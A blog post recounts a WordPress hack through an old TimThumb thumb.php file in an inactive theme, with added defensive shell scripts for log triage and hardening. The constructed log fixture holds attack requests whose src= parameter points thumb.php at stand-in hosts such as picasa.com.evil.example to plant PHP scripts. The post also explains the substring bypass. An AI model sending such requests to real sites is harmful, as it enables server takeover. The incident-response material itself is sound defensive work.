One of the WordPress sites that I manage was recently hacked. Yes, hacked! I'm going to explain the main reason my site was so easily defenseless against the attacker.
I used the Woo Canvas theme and had already taken all the WordPress security measures to protect my site, but the hacker still succeeded in hacking the main page. How did this happen? Is WordPress safe? How do I avoid it? Is it going to happen again? What if it happens again? How do I prevent it from happening again? Tons of questions ran through my mind.
Also, being an avid web dev geek myself, the other part of my brain started asking questions like: how did he break in? What technique did the hacker use? I need to meet this guy.
So here's what I did:
- Looked at the server logs
- Found out where the requests were coming from
- Found the vulnerability in my theme file
- Found and removed any suspicious files
#1. Look at the server logs
This is the first thing anyone should do when a site gets hacked or hijacked. Where do you find them, you ask? Simple: they should be available in your hosting control panel. Or, if you are using an FTP client, look for files named access_log and error_log and open them in a text editor. The access log holds the full request line for every hit, including the source IP and the URL with its query string, which is what you need to trace an attack; error_log mostly holds PHP warnings and notices, though a failing script often leaves traces there as well.
When I looked at the logs I found that many unnecessary requests had been made to the thumb.php file from a particular IP. Since the hack had happened only a few minutes earlier, I was easily able to identify the real culprit from the logs.
#2. Found a pattern
Multiple accesses to my /wp-content/themes/headlines/thumb.php file. I wasn't really sure why there were so many requests to the same file, but I was really surprised.
Then I looked at the file access time. It matched the time the site was hacked. So I Googled my find, "thumb.php exploit", and got about 1,360,000 results. Reading through them, I learned that I wasn't the first one to be exploited this way. It had already been done, a lot of times, to a lot of websites.
#3. Concluded that my old theme file was screwing me
Yes, an old theme file I had was used to screw me over. I was under the impression that the site was using the latest Woo Canvas theme's thumb.php file, but that wasn't the case. The hacker somehow managed to find the inactive theme that was still sitting in the wp-content/themes folder.
#4. Finding any leftover files from the hacker
Hackers usually leave some code behind so that they can hit the site again. So make sure to compare your WordPress installation files against the originals (http://phpxref.ftwr.co.uk/wordpress was extremely helpful); a fresh download of the same WordPress version, diffed file by file, works just as well, and every theme and plugin directory needs the same treatment, active or not. Looking in the cache folder, I found two weird files, externl_28ajssjlaax.php and wsob.php, and deleted them. That folder should hold nothing but images, so anything with a script extension, or anything that starts with a PHP tag, does not belong there.
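The four-step investigation above, as an added example that is not part of the original post: a POSIX shell script that runs the same triage over a constructed Apache access log (combined log format; documentation IP addresses; the two file names are the ones the post reports) and a constructed cache directory. The stock $allowedSites domain list of older TimThumb releases and the temporary paths the script creates are assumptions of the example.

```shell
#!/bin/sh
# Added example (not from the original post): triage an Apache access log for
# TimThumb abuse, then look for leftover scripts in the cache directory.
# The log lines and cache files are constructed for illustration; the IPs are
# documentation addresses and the file names are the ones the post reports.
set -eu

WORK="$(mktemp -d)"
ACCESS_LOG="$WORK/access_log"
CACHE_DIR="$WORK/wp-content/themes/headlines/cache"

# Domains the stock $allowedSites list named in older releases (assumed here;
# compare with the array in your own copy of thumb.php).
ALLOWED="flickr.com picasa.com blogger.com wordpress.com img.youtube.com upload.wikimedia.org photobucket.com"

cat > "$ACCESS_LOG" <<'LOG'
198.51.100.7 - - [12/Sep/2011:14:01:58 +0000] "GET / HTTP/1.1" 200 8123 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Sep/2011:14:02:11 +0000] "GET /wp-content/themes/headlines/thumb.php?src=http://picasa.com.evil.example/wsob.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Sep/2011:14:02:12 +0000] "GET /wp-content/themes/headlines/thumb.php?src=http%3A%2F%2Fblogger.com.evil.example%2Fexternl_28ajssjlaax.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.45 - - [12/Sep/2011:14:02:14 +0000] "GET /wp-content/themes/headlines/cache/wsob.php HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Sep/2011:14:03:00 +0000] "GET /wp-content/themes/canvas/thumb.php?src=http://img.youtube.com/vi/abc/0.jpg&w=150 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
LOG

mkdir -p "$CACHE_DIR"
printf '\377\330\377\340JFIF' > "$CACHE_DIR/a1b2c3.jpg"   # a real cached thumbnail starts like this
printf '<?php /* stand-in for a dropped script */ ?>' > "$CACHE_DIR/wsob.php"
printf '<?php /* stand-in for a dropped script */ ?>' > "$CACHE_DIR/externl_28ajssjlaax.php"
printf '<?php /* PHP hiding behind an image name */ ?>' > "$CACHE_DIR/9f8e7d.jpg"

# Step 1: who is hitting thumb.php / timthumb.php, busiest source first.
thumb_requesters() {
  grep -E '"(GET|POST) [^ ]*/(tim)?thumb\.php' "$1" | awk '{print $1}' | sort | uniq -c | sort -rn
}

# Step 2: pull the host out of each src= parameter and keep only hosts that
# merely *contain* an allowed domain.  Vulnerable TimThumb did a substring
# check, so picasa.com.evil.example passed as if it were picasa.com.
suspicious_src_hosts() {
  grep -E '"(GET|POST) [^ ]*/(tim)?thumb\.php\?[^ ]*src=' "$1" |
  sed -E 's/.*[?&]src=([^& ]*).*/\1/' |
  sed -E 's#^https?(%3A%2F%2F|://)##; s#[/%].*##' |
  while IFS= read -r host; do
    for allowed in $ALLOWED; do
      case "$host" in
        "$allowed") ;;                 # exact match: a genuine remote image
        *"$allowed"*) echo "$host" ;;  # substring only: bypass attempt
      esac
    done
  done | sort -u
}

# A direct request for a script inside a cache directory is the attacker
# running what they just planted; these lines confirm the compromise.
cache_script_hits() {
  grep -E '"(GET|POST) [^ ]*/cache/[^ ]*\.php' "$1" | awk '{print $1, $7}'
}

# Step 4: TimThumb only ever writes image data to its cache, so any file with
# a script extension, or any file that starts with a PHP tag, is a leftover.
cache_leftovers() {
  find "$1" -type f | while IFS= read -r f; do
    case "$f" in
      *.php|*.phtml|*.php5|*.pl|*.py|*.cgi|*.sh) echo "$f"; continue ;;
    esac
    if head -c 64 "$f" | grep -q '<?php'; then echo "$f"; fi
  done | sort
}

echo "== requests to thumb.php, by source IP ==";            thumb_requesters "$ACCESS_LOG"
echo "== src= hosts that only look like allowed domains ==";  suspicious_src_hosts "$ACCESS_LOG"
echo "== direct hits on scripts inside a cache directory =="; cache_script_hits "$ACCESS_LOG"
echo "== non-image files in the cache directory ==";         cache_leftovers "$CACHE_DIR"
```

Run it as-is to see the four reports; to reproduce the investigation on a real server, point thumb_requesters, suspicious_src_hosts and cache_script_hits at the site's access_log and cache_leftovers at each theme's cache directory. The full request line with its src= parameter lives in the access log, so that file, not only error_log, is the one to pull.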
How to fix it and make sure this never happens again?
There are three main things that need to be done here.
- Update the thumb.php or timthumb.php file
- Empty the list of external sites in thumb.php
- Add a .htaccess file to your cache directory
#1. Update the file
The original source repository for thumb.php was on code.google.com. Visit the site and replace the thumb.php or timthumb.php file with the latest version. Do it for every copy on the server, not just the active theme: the attacker used a copy sitting in a theme that wasn't even active, and themes and plugins can each carry their own copy. (Google Code has since shut down and TimThumb's author has discontinued the script, so today the better fix is to remove it altogether and rely on WordPress's built-in image sizes.)
#2. Empty the allowed sites list
Vulnerable versions of thumb.php will fetch the file named in the src parameter from a remote server and save it into the cache directory, as long as the host name contains one of the domains in $allowedSites. That check was a plain substring match, so a host like blogger.com.attacker.example passed, and the fetched file kept its original extension, which is how PHP scripts ended up in the cache folder. Unless you genuinely need images pulled from external sites, leave the array empty:
//external domains that are allowed to be displayed on your website
$allowedSites = array();
Newer (2.x) copies name the array $ALLOWED_SITES and gate remote fetching behind an ALLOW_EXTERNAL setting; keep that set to FALSE as well.
#3. Add an .htaccess to the cache directory
Now that we've updated and patched the thumb.php or timthumb.php file, we also want to make sure nothing that gets stashed in the cache folder can ever be executed. Upload a new .htaccess file to the cache directory with the following line:
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
This hands those extensions to Apache's CGI handler instead of PHP, and because ExecCGI is off unless someone enabled it for that directory, Apache answers with a 403 instead of running the file. Verify it afterwards: drop a harmless test .php file into the cache folder, request it in a browser, and make sure you get an error page, not output. This only helps on Apache with .htaccess overrides enabled; on nginx or other servers, add the equivalent deny rule in the server configuration.
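The three fixes above, applied to every copy of the script at once, as an added example that is neither the post's nor TimThumb's own code: a POSIX shell script that finds each thumb.php/timthumb.php under wp-content (active or not), reports its version and whether the remote-fetch list is still populated, and writes the protective .htaccess into each copy's cache directory. Assumed here are the constructed two-theme fixture under a temporary directory, the define('VERSION', ...) line format, the two array names ($allowedSites in 1.x, $ALLOWED_SITES in 2.x), and the choice to treat anything below the 2.0 rewrite as stale; the Options -ExecCGI line is an addition to the AddHandler line the post recommends.

```shell
#!/bin/sh
# Added example (not from the original post): audit every copy of
# thumb.php / timthumb.php under wp-content, active theme or not, then drop a
# protective .htaccess into each copy's cache directory.  The theme tree
# below is a constructed fixture: an updated Canvas copy and a stale,
# inactive Headlines copy like the one the post describes.
set -eu

WP_CONTENT="$(mktemp -d)/wp-content"
mkdir -p "$WP_CONTENT/themes/canvas/cache" "$WP_CONTENT/themes/headlines/cache"
cat > "$WP_CONTENT/themes/canvas/thumb.php" <<'PHP'
<?php
define ('VERSION', '2.8.10');
$ALLOWED_SITES = array();
PHP
cat > "$WP_CONTENT/themes/headlines/thumb.php" <<'PHP'
<?php
define ('VERSION', '1.33');
$allowedSites = array('flickr.com', 'picasa.com', 'blogger.com', 'img.youtube.com');
PHP

# Version from the define('VERSION', '...') line, or "unknown".
timthumb_version() {
  v="$(sed -nE "s/^[[:space:]]*define[[:space:]]*\([[:space:]]*['\"]VERSION['\"][[:space:]]*,[[:space:]]*['\"]([^'\"]*)['\"].*/\1/p" "$1" | head -n 1)"
  if [ -n "$v" ]; then echo "$v"; else echo unknown; fi
}

# Is the allowed-sites array empty, populated, or missing?  Matches both the
# 1.x name ($allowedSites) and the 2.x name ($ALLOWED_SITES).
remote_list_state() {
  if grep -iqE '\$allowed_?sites[[:space:]]*=[[:space:]]*array[[:space:]]*\([[:space:]]*\)' "$1"; then
    echo empty
  elif grep -iqE '\$allowed_?sites[[:space:]]*=[[:space:]]*array' "$1"; then
    echo populated
  else
    echo absent
  fi
}

# One tab-separated line per copy: path, version, list state, action.
audit_timthumb() {
  find "$1" -type f \( -name thumb.php -o -name timthumb.php \) | sort |
  while IFS= read -r f; do
    ver="$(timthumb_version "$f")"
    state="$(remote_list_state "$f")"
    action=""
    # Assumed threshold: anything below the 2.0 rewrite is treated as stale.
    case "$ver" in
      unknown|0.*|1.*) action="UPDATE" ;;
    esac
    if [ "$state" = populated ]; then
      action="${action:+$action,}REMOTE-FETCH"
    fi
    printf '%s\t%s\t%s\t%s\n' "$f" "$ver" "$state" "${action:-ok}"
  done
}

# Write the protective .htaccess into every cache directory that sits next to
# a copy, and print each directory handled.  The AddHandler line is the one
# the post recommends; Options -ExecCGI is added here so Apache answers 403
# rather than trying to run the file as a CGI script.
harden_cache_dirs() {
  find "$1" -type f \( -name thumb.php -o -name timthumb.php \) |
  while IFS= read -r f; do
    d="$(dirname "$f")/cache"
    [ -d "$d" ] || continue
    cat > "$d/.htaccess" <<'HTACCESS'
# Nothing stored in TimThumb's cache directory may be executed.
AddHandler cgi-script .php .pl .py .jsp .asp .htm .shtml .sh .cgi
Options -ExecCGI
HTACCESS
    echo "$d"
  done
}

echo "== TimThumb copies under $WP_CONTENT =="
audit_timthumb "$WP_CONTENT"
echo "== cache directories hardened =="
harden_cache_dirs "$WP_CONTENT"
```

Against a real install, call audit_timthumb and harden_cache_dirs with the path to wp-content instead of the fixture. For 2.x copies also confirm ALLOW_EXTERNAL is FALSE, which the array check alone does not tell you. Options in a .htaccess file needs AllowOverride Options in the Apache configuration; without it the directory returns a 500 instead of a 403, so request a harmless test .php file in the cache directory after running this and confirm the response is an error page and not script output.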
Oh, and the hacker calls himself "Hmei7"; I would love to meet him, though :). I'm probably going to send an email out to all my WordPress clients to let them know to update their thumb.php files and follow the same steps I used. Being cautious is better than being hacked cautiously. Hail WordPress!